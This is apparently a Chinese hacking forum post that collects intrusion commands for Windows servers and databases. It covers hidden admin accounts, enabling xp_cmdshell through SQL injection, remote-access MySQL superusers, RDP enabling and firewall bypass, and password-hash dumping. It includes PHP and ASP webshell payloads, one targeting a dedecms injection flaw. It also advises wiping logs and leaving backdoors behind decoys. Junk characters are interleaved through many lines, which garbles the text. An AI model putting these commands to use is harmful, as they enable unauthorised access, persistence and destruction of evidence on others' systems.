3 Y3 p. E0 E' U' u G2 V0 t. ~7 S7 j
1.net user administrator /passwordreq:no8 r, N) ~( e8 \8 A3 X6 A* ]: B
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
) N$ A7 w' `/ ~1 i' R2.比较巧妙的建克隆号的步骤
/ _* H% U/ u* M# z! s先建一个user的用户; t: Y: r# f& i! l) w0 x! x
然后导出注册表。然后在计算机管理里删掉
7 {" W1 y5 n9 |# ]6 M9 G6 T在导入,在添加为管理员组
" g) K7 B5 N C/ w9 ^, h3.查radmin密码6 V* D6 q+ L8 \# v- @% j
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
& k/ I# a; g8 |( |4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]& l5 F" M; ]. a' ^- y
建立一个"services.exe"的项
7 K/ @# U1 Y( E- A- c0 M9 F再在其下面建立(字符串值)
+ I! v: ^* ~2 d& t键值为mu ma的全路径; L4 R$ x) l g' B" X6 M
5.runas /user:guest cmd, C) g; O4 |! h
测试用户权限!
0 Q% g, c( E6 l* z1 K/ y9 T' G6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
% s* c2 ~" h! [* ?7.入侵后漏洞修补、痕迹清理,后门置放:7 G+ o6 ?3 [- h3 _+ g
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
* G; `: _$ y3 Y# H0 @8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c3 i6 a, D5 Y6 ?# O ?
- ^% [! s6 B9 r" U- i/ kfor example
5 y- v) R1 p' M/ n& k8 q7 `- @& Z$ i& x
6 |9 v7 ~! z$ a9 V1 T1 ddeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
9 H) N7 V% i7 |
0 k7 M' s8 z! m% k' B! |declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
* @& j$ A! E+ [3 l' A* B: w) J; Y$ i! C2 J; s' w& T# C$ S- M
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了: k( s# _. R5 t
如果要启用的话就必须把他加到高级用户模式
5 L: t4 n) h1 _可以直接在注入点那里直接注入0 x" n$ u0 W5 O$ L" Q
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--# k( y+ e; W* y# W6 |* h: q" Y* m1 ^
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--5 c+ i( o! U5 t: w5 o. b! D4 d# O
或者
$ |0 r+ ~( H( Gsp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
+ e& u) K0 e1 A! H3 z0 S来恢复cmdshell。6 O% W, H( d+ C4 i" J' N
/ L% ?0 ~$ R h6 Z% e) N( M
分析器( k. _; S, W& _% G
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
# X6 v; W9 R. T7 _! B5 i: ~然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll"), m: I1 J+ g6 i2 V8 J8 J) [: ^
10.xp_cmdshell新的恢复办法
* Z* U1 v+ n1 H' n) _ u* Dxp_cmdshell新的恢复办法
3 c' t. A9 A" E6 i扩展储存过程被删除以后可以有很简单的办法恢复:
2 F, O) M1 Q& _+ U9 G删除
8 L; f- R! ^7 Z g/ w* E3 i+ Zdrop procedure sp_addextendedproc
% T) S# K6 u$ _9 t, J4 Cdrop procedure sp_oacreate' J8 u3 y: \- b( O, t$ w
exec sp_dropextendedproc 'xp_cmdshell'
$ J( k# _$ n) |
0 e9 v! [9 z# C) @; X恢复
6 u1 E) v$ e* T& b' J1 s$ O5 g; d8 Adbcc addextendedproc ("sp_oacreate","odsole70.dll")9 e5 j1 `. F: J9 e: c1 o, X
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")( I' Z9 b' k, a4 f( L g
]) K0 @: s# g$ L: p) p这样可以直接恢复,不用去管sp_addextendedproc是不是存在3 k$ i4 T: C5 x2 E. g" T
* F. g/ f' Y, e
-----------------------------0 b. `, t# r; J1 q
9 u9 {1 [2 _" r& H: v6 F删除扩展存储过过程xp_cmdshell的语句:
5 `# Y; g. \( z H U7 a; rexec sp_dropextendedproc 'xp_cmdshell': A2 n5 q7 y8 i/ D& s9 w+ H# t# S
- [7 }! k" N; L" ]
恢复cmdshell的sql语句% ~6 \5 [! T* |* [
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
) G( z* `! x7 c2 J) S
' m: F7 L* r* t3 H' s5 I: z, ?7 Q9 u7 j* L
开启cmdshell的sql语句; ^% Q* P: ^. ]9 u; O
5 \) [3 A9 A Y- Rexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
! h' D$ \2 y% L/ \4 f; l6 j. v u9 S; e2 ^) w
判断存储扩展是否存在* C& b ~% w' B. W/ L
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'0 _. v7 @1 P7 `/ ]3 P
返回结果为1就ok, t2 L" y( [) y# }9 I, H
2 H2 l8 {# r8 n7 `- R2 }: S恢复xp_cmdshell- ^$ L! d% s5 X+ d0 L
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
) I# @: f* M7 Q返回结果为1就ok
2 d! R; X! I# i* L% g, ]
( p7 f# }- F( ?! W) T' r否则上传xplog7.0.dll
( q+ y9 ^ P5 h- K) e( lexec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
7 U. e! l! ?7 u6 ?3 n/ F# s" V& C9 B3 N2 x+ x* E5 a" u7 e$ _
堵上cmdshell的sql语句 [3 [/ N: y" u- {
sp_dropextendedproc "xp_cmdshel" k s1 n$ d" ?% c$ m0 ?! a% _9 [
-------------------------
( r# }: }7 Z5 U+ S0 q5 D9 p0 P清除3389的登录记录用一条系统自带的命令:
3 ^2 S0 b A; j! K- ~reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
8 s5 {, e0 H8 _; x' C4 Y
! M' Z8 z5 G9 M5 L" E然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件* J% O8 W- z/ \5 U' u+ k" `
在 mysql里查看当前用户的权限6 r/ D a- j! f1 y4 V) u) x
show grants for , A2 s8 M* P; w" L) P/ g' A1 u2 ?
& C2 z8 P8 R# h3 d以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。7 c2 l% r& X4 u" ?9 V
5 V1 m. b3 \# k- @
: C& l5 F8 m" b: }Create USER 'itpro'@'%' IDENTIFIED BY '123';
& l4 R' N% @$ O+ v, J* Q% u
3 I* c' I$ |. `& t2 L$ X1 }2 A* l4 [8 s8 AGRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION8 G! H" s5 F2 m; P: e* P( f( i
& ~5 V: `1 J( a, m' ^4 iMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
" y/ |* ~2 v/ \6 H
3 P4 ?7 X1 S& e3 d" I8 h- r1 gMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;6 r: d3 y1 [1 e- I6 q0 J
- h6 E. Y; c. c1 z+ _- X k6 }$ c
搞完事记得删除脚印哟。" V9 I$ V) B4 u+ `
( l2 o, g' D6 D8 f; c, |% K0 k" wDrop USER 'itpro'@'%';( C. P% @& {7 }9 G
1 b3 A: Q) E( d, [" T6 [6 K
Drop DATABASE IF EXISTS `itpro` ;9 {5 r- F9 b8 s4 @3 q0 [
) G4 ~' [; Y' R/ i: l3 e6 A9 k4 U
当前用户获取system权限 t: J4 t$ m$ k$ V
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
; n# N" U9 M: X- z8 Z, K: osc start SuperCMD
% e" a+ N( D2 \ _7 Q$ L+ ^" H& m程序代码/ j; ] C- }( u5 M; D
<SCRIPT LANGUAGE="VBScript">
8 A" p$ e) `/ T* i% P3 z7 Sset wsnetwork=CreateObject("WSCRIPT.NETWORK") ^4 s9 j/ K2 W) ?
os="WinNT://"&wsnetwork.ComputerName# t9 k+ N/ }' y5 e0 `
Set ob=GetObject(os); @, u! G/ X% B% d+ B, X" [
Set oe=GetObject(os&"/Administrators,group")9 U$ q" m, _6 a- \/ a$ e
Set od=ob.Create("user","nosec")
0 \+ } [" P. ]/ [, s. G/ ^- D& nod.SetPassword "123456abc!@#"
: a5 [! _" z' i0 eod.SetInfo
8 j5 ^" q$ b b( CSet of=GetObject(os&"/nosec",user)
7 [% ]1 B% I; N2 G3 C4 Y5 f0 Q3 ioe.add os&"/nosec"
: q# b9 N M" B! P8 k; x- |0 M</Script>
/ c! ~& H4 N5 y8 P L<script language=javascript>window.close();</script>( g2 s" Q, R0 k( p2 |8 P
- ~/ y% w. X" m9 S
5 k/ N: z5 f M# R4 E# B$ l1 A# g' B w) ?$ p5 E
0 a# E. s/ R( \5 D% T" F
突破验证码限制入后台拿shell+ E& S( ~: N2 D) G4 i7 ^( H% t
程序代码* _: u% T1 m" v1 q- e* ^# p6 x
REGEDIT4
- G9 @8 }! i! l2 ^. ^' Y3 o[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] 9 n+ A1 Z6 Z- S4 ]! e
"BlockXBM"=dword:00000000 J9 s* g" D3 X" |8 X m' W/ X
( m4 I, O2 L2 A) ~0 ~# M
保存为code.reg,导入注册表,重器IE# G3 q: t4 V+ w8 J; ?8 i
就可以了' A5 _ [4 |% G& ~ J
union写马
* G3 l( @8 d! Z0 N, D3 y程序代码
; w3 Y# e# e3 C3 Y& W8 swww.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*8 {) S4 Q K8 C# O* H
/ Z3 E/ l X5 X+ k应用在dedecms注射漏洞上,无后台写马
, l( f4 W7 y5 e( B4 i3 |# z2 Udedecms后台,无文件管理器,没有outfile权限的时候
* K( x* ~8 L: z; V, o7 A在插件管理-病毒扫描里9 ^( k4 m ^' E) c0 |
写一句话进include/config_hand.php里
! s' f0 Y& ~& ?; `; l程序代码! C* y# W6 t* E# h! r& E
>';?><?php @eval($_POST[cmd]);?>0 q9 d1 O, S4 n7 m7 N3 o
$ q* `& C' m! z9 c; y
! E- M9 C- X% ?- l/ N8 y: i
如上格式% Y% {" {2 t1 r- o/ ]. M9 I# @8 |
" r& H! Y1 s7 L& J6 N: G
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
# m/ h8 e! P. x' N( I |- {程序代码0 K7 j8 A" L' L6 K$ H, m
select username,password from dba_users;2 Q" K/ j% ^# q4 ~% y4 ?8 e# Y7 j
, k6 V" {, X# I$ d* ^$ q6 H* W5 l) {5 A& ^
mysql远程连接用户$ Z9 J7 R# g, k; | X/ I1 i
程序代码
) o+ C, E9 u1 ~: E# h
, ~) g! l/ @% J3 j. oCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
/ {0 Y9 b- x& W# j2 X6 L4 jGRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION+ K0 Q7 `4 W H$ B
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
0 p2 I( j1 P: ~: E% o* ^* IMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
. B/ m6 O! D+ R/ t- j x/ R( o( I/ y
. p, q! i7 ~, g0 U& u; y7 w4 r5 [3 E( S$ N/ E
: I6 ?! o4 x' b/ Iecho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
9 Y+ h% V. A0 m" M! W, }% V E9 N' B3 Q- r2 Y" \- v3 M/ L
1.查询终端端口4 Y0 G7 w' }7 Q8 R$ }4 [
* @5 \, e0 M' z, |$ Sxp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
1 S0 i# {* z" B) E/ \
& {% o/ \+ {" Q通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
, @# [! r' g T# N% Btype tsp.reg6 c* `. N9 Z) E8 V2 R- j
7 W- g( }3 B. X# {
2.开启XP&2003终端服务
; n, H% g6 c& Q- G0 C7 E4 ~( v6 ?- M+ Y
6 Z! |5 ^2 @3 C- `4 [" s+ ?REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f8 L+ l' X: x% k% T- \
& f, e, I/ `- i- v% \
/ J; ]' `: q V- S- k1 CREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
% G% R. M; E% X1 g7 z. W% z8 ^
# b1 i* t y- ~+ K1 I7 I5 I% n3.更改终端端口为20008(0x4E28)( X( q2 P" C, d5 ]
% Z0 k2 [9 o' A6 H* Z* cREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f \6 m3 {: R* E7 a `+ _7 _2 X
' S8 ~: K; R+ p, F2 ]
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f' y! Q. r L9 u6 m% ?/ z' ~
+ @; k) g) x; I+ j7 {' K: |
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
+ C! H' ?3 E' g. }
% B! Y. r# B! jREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
) P$ B0 ~0 E& X* v0 y! k' b2 q: w: C; o- C" F
8 `% K, ^& I0 K( b" n; K
5.开启Win2000的终端,端口为3389(需重启)2 E! T, B* M" v
1 c2 d1 }$ z5 F+ n5 R# C
echo Windows Registry Editor Version 5.00 >2000.reg , t$ @7 n: Z Z" Z1 s: C
echo. >>2000.reg1 G* s# {* T1 s
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg / z( J! [& F: T3 J3 s
echo "Enabled"="0" >>2000.reg
; B H+ {# V6 b& f+ V5 Gecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg 6 Q3 O8 d; m/ X8 D; c
echo "ShutdownWithoutLogon"="0" >>2000.reg 2 \8 G6 K1 k$ s6 k/ U
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg 3 T* r6 i% H# Q4 `4 f) p
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg ( ~! q4 x. b/ V
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg ' t5 t/ p% l& g/ g% K( z0 H
echo "TSEnabled"=dword:00000001 >>2000.reg ; B. f5 v% f5 G B y# o+ {
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg 8 X- M7 q* ~" o; _6 @4 d3 V7 k
echo "Start"=dword:00000002 >>2000.reg ' B: y4 _+ Q! k6 O
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg ; ]) S) x0 H- b9 V# Y' \7 f
echo "Start"=dword:00000002 >>2000.reg . ? N: N4 ?( A% Z2 X
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
' Q1 C" D" U1 l. a3 D+ Aecho "Hotkey"="1" >>2000.reg
# K2 @$ T. O! d$ [9 e* Y! @. lecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
0 y+ e0 f& S5 Y- [0 E( c& o/ Mecho "ortNumber"=dword:00000D3D >>2000.reg ! x' G/ R, N2 l( H
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg 2 ^1 `9 K+ _# J2 ]9 G8 c
echo "ortNumber"=dword:00000D3D >>2000.reg
0 O% {' T% F2 a$ }; {, V0 u
. S6 g: d5 s8 r' {" ?+ e2 f6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
0 _+ n# H6 |0 G' {$ B* \" T
1 Y) n3 Z' s2 f@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
1 ?7 f; e8 L* d+ M- y+ {2 R- _(set inf=InstallHinfSection DefaultInstall)
9 k) Q Y+ s$ z, }: } ]& T" Lecho signature=$chicago$ >> restart.inf
/ ]- ~! x# ]2 c; Jecho [defaultinstall] >> restart.inf( w u, L O! V( O/ w0 c
rundll32 setupapi,%inf% 1 %temp%\restart.inf
8 N% n% j5 O r4 r" r
; V$ {8 G. E, A+ z: N0 n: H# d+ J- G. n* ~" j
7.禁用TCP/IP端口筛选 (需重启)
2 o: u1 @ r( C( }% Z: N8 v. c. D, N& a5 i! L1 }( H! `7 _
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
0 b3 ?" U! j: a5 |# S* m; T: V2 [( f
8.终端超出最大连接数时可用下面的命令来连接
! E& w' e& ?+ @$ \ `
T+ S# \5 h# {$ K [mstsc /v:ip:3389 /console! D3 c: f7 n) p% y6 z2 b6 D
1 J: \, P1 f( J7 I W
9.调整NTFS分区权限
3 n4 L. d# D; p; }
5 J2 Q" k {; n$ P4 ~, ^cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)5 X" X6 R+ _( p% i* @# F$ a: X8 n. a
0 _' T* i# n5 y& S: e
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
: A) b- A5 V) ]4 ]# |& D/ t+ c4 C6 M/ g' T, ]$ s8 M9 i
------------------------------------------------------1 R# y t+ l2 D; y8 E1 N, r
3389.vbs
4 m* q w% l2 m. q& P3 vOn Error Resume Next1 v6 |& Y: r5 k2 v
const HKEY_LOCAL_MACHINE = &H800000024 Z1 I- b' k5 i' v
strComputer = "."
4 v( k( f$ u. ]8 j7 Q0 K$ d lSet StdOut = WScript.StdOut" I; n) {* h8 X$ |. _8 v
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
; A2 \1 e u3 V" H6 w2 Q7 QstrComputer & "\root\default:StdRegProv")$ a4 _& x- j0 T5 M2 _. l1 K
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"1 }8 P" _5 p4 |
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
; x& T5 G6 i3 A- r0 zstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
' i( w" t* |4 O5 Foreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath) q f6 T5 B) o- P) z
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp", s: j& w x2 h
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
1 T* z* l' e+ a3 ^; I3 A) wstrValueName = "fDenyTSConnections"+ w @* y, o9 l+ Y( B- C$ ?1 e
dwValue = 0
7 U' q _$ c2 uoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
" z7 Z, U3 {" t) U* {' t% dstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"! a F( X3 q. e# ^9 F1 k* |: p- i7 P d
strValueName = "ortNumber"7 R( c, U9 o2 r6 C: Q
dwValue = 3389
! c3 y. N+ V+ J7 A* t% W* Noreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue. M7 [/ k! ^) M& ?0 Q; ]
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"! x' @( D, t% {1 ?; [
strValueName = "ortNumber"/ p$ U. g' p) p+ q
dwValue = 3389: ~" Q6 y: V, O& s$ a. L
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
; m) Y9 ]- Q9 q1 D6 _+ u: F; X2 QSet R = CreateObject("WScript.Shell") / k3 B! J1 x+ J( n- v
R.run("Shutdown.exe -f -r -t 0") # {' s4 c- G& N" W/ s) g6 r! g
+ m) G+ i ]' W" P4 W# |删除awgina.dll的注册表键值+ |9 p9 N; c( M0 ?+ F# w
程序代码7 v3 ~+ x0 m' u; ]
+ H9 o) D- u. r3 X; H( q
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f& M8 i6 g5 L$ D; n; g: N. o! _
! R9 H0 |6 _/ [. z8 `. z5 h4 |& R0 C/ _
* r* o, }3 ^0 W- R7 N, T/ o
; `8 ?7 h, p1 s' g% a+ j% l8 W程序代码& p. W, [$ J! V) ^: h u; }* O) |/ n+ a
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash# g. b& }( _3 p5 S
' w/ p @+ V3 ~( z4 C设置为1,关闭LM Hash
% h, S% r: O+ i; y+ l2 z t9 }3 n% `4 m% q, S. A4 d" ~
数据库安全:入侵Oracle数据库常用操作命令
6 z( R- g- \8 ~. l/ {& l5 u$ d最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
$ O/ t; ?8 b1 C: r4 H9 K+ F* u1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
& J3 v& g7 u: {, M; B1 b/ n2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
! x" F, J: P' `- o- y! L3、SQL>connect / as sysdba ;(as sysoper)或9 z a/ N* i! x
connect internal/oracle AS SYSDBA ;(scott/tiger)/ i7 V1 F' E$ X2 ]+ C
conn sys/change_on_install as sysdba;6 i* K( E$ L1 Z$ i1 |
4、SQL>startup; 启动数据库实例
3 P+ v1 p( E8 G' M+ u5、查看当前的所有数据库: select * from v$database;
* v; y& T8 A5 i5 Y6 \select name from v$database;
- J$ {9 ]% @8 Q0 M: K. h( E6、desc v$databases; 查看数据库结构字段
1 g. M4 i. W; o+ r7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
d5 l3 P6 Y8 U7 I, w y f8 `SQL>select * from V_$PWFILE_USERS;+ G# i; \0 o$ H* V R* U
Show user;查看当前数据库连接用户+ L( @# E- ^9 _3 O
8、进入test数据库:database test;- s6 i2 P$ [! Z* s: p" ~0 s
9、查看所有的数据库实例:select * from v$instance;7 \7 {, I7 w% N* }1 D
如:ora9i
: v* T; ~1 C" c0 Y+ o9 B10、查看当前库的所有数据表:
5 U6 l4 w; |2 c; [) U7 o. t ?SQL> select TABLE_NAME from all_tables;$ T9 w, \ x4 R0 W0 O
select * from all_tables;
/ i/ e+ t! z) a- H9 n# d2 sSQL> select table_name from all_tables where table_name like '%u%';0 N- u7 T$ x( G; c
TABLE_NAME A8 r3 k% M% e0 O$ K1 T
------------------------------
# ~6 |1 l6 g/ s7 U1 [ K_default_auditing_options_: g% T7 G# C, w0 k N/ B
11、查看表结构:desc all_tables;2 q1 l" w9 e+ x1 t
12、显示CQI.T_BBS_XUSER的所有字段结构:
; V. J8 W9 m1 o1 w. Bdesc CQI.T_BBS_XUSER;5 O& _! v8 r& m# ?
13、获得CQI.T_BBS_XUSER表中的记录:
% `; O# [0 b3 i# g7 c& Sselect * from CQI.T_BBS_XUSER;6 \* [% Z7 ]2 o0 A/ Y
14、增加数据库用户:(test11/test)- h, b: P9 J3 u/ G
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
! G5 \( w F4 w1 M. V1 U& R3 P: o" z15、用户授权:
! f& D1 A# x7 }" g/ j, Ogrant connect,resource,dba to test11;3 {( N8 D1 I7 D z2 N3 R
grant sysdba to test11;" @+ I. {* G( w7 C+ v/ d
commit;
4 q( u' L: J+ x9 P) D- ?( E4 q16、更改数据库用户的密码:(将sys与system的密码改为test.)* J6 a2 S* i2 R9 a; l
alter user sys indentified by test;
3 Q' l: }: T- l' m, c: Aalter user system indentified by test;6 Z, u, O9 _7 |2 Y% k. d
3 D% c- O2 j' b( j/ b; L) V" RapplicationContext-util.xml
3 H* y0 q P: HapplicationContext.xml* Q0 J' a# F* u/ M
struts-config.xml9 D3 f: {6 S( b6 C
web.xml
, e& [8 P7 j1 @: A/ dserver.xml
# N4 [2 C% X: Q& M% `8 r1 _! Jtomcat-users.xml7 O+ L- ]0 d/ t1 I% b8 ~7 s7 w
hibernate.cfg.xml
3 A- {4 k7 @1 J4 T3 f5 Sdatabase_pool_config.xml0 L1 C! q8 W2 S: A, u) b* ]9 U
* p2 k4 v2 @( t' Q2 c6 r/ B
4 |& I9 D1 `# {* @( s6 F' Q9 t* q# Y\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置7 v+ s8 H$ U! @% m# v8 J
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini/ P6 h2 n% p2 n8 A* t9 D: B) M0 ^( U$ p
\WEB-INF\struts-config.xml 文件目录结构. s( `% Z3 v4 h2 e s
( }" H. B6 Y6 I- s1 ]" wspring.properties 里边包含hibernate.cfg.xml的名称, e" y/ r: }8 [1 i5 H( @* {" E4 Q" A
. p6 u$ k; u V2 T' M) _
$ }& F( S7 u% I8 x, r+ BC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
* W4 C1 z) i9 n2 V- f/ Z
) o# N' a+ Q3 g3 F如果都找不到 那就看看class文件吧。。 z8 U' V* ^0 K S
- S2 M' _9 q! w5 k
测试1:! [: H& e! h6 `# d
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t11 @6 \0 O7 m# [0 c J
' ~& ^' |+ Z9 Q G. U
测试2:
; m6 }4 u% u5 D7 X" H. w4 r. B C7 u; s
create table dirs(paths varchar(100),paths1 varchar(100), id int)
+ f2 ~6 h" B! O' f( N7 S
) o, j3 G+ {5 E4 hdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
+ N: Z. e' Y6 Q6 R. s; h+ s( s. P; @, F( @
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
; H1 S6 _. M6 h
: ^& J/ c( T3 {( E5 D1 Q5 |查看虚拟机中的共享文件:( Y: w1 q, \/ L! Q6 K' t- O
在虚拟机中的cmd中执行
5 L9 X/ M% ?4 R0 Q; ?/ F* ?\\.host\Shared Folders
1 J8 S, f8 G7 P6 m& N/ U0 R+ A0 q h( @8 x: v: J+ v6 F
cmdshell下找终端的技巧8 }& V g& e( ~. o, o
找终端:
$ P* O( @$ h# R% ]' Y第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! 7 S y) _; ] `4 I/ c6 O/ Y& I
而终端所对应的服务名为:TermService 9 ]3 l2 s* b) ]2 F
第二步:用netstat -ano命令,列出所有端口对应的PID值! / J" \9 W6 u1 {" C$ y8 y7 _
找到PID值所对应的端口6 f5 w% `: U! X+ s9 H" v) O3 B
; G2 E' u! [8 g& o$ ]' W! d- _4 K
查询sql server 2005中的密码hash
6 X! z% F' q$ {- k: W2 p; {" O0 pSELECT password_hash FROM sys.sql_logins where name='sa'
0 l( t# ~8 u( J* hSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a% B' Z) E$ l; J5 I/ J
access中导出shell: E/ I, S1 E# d
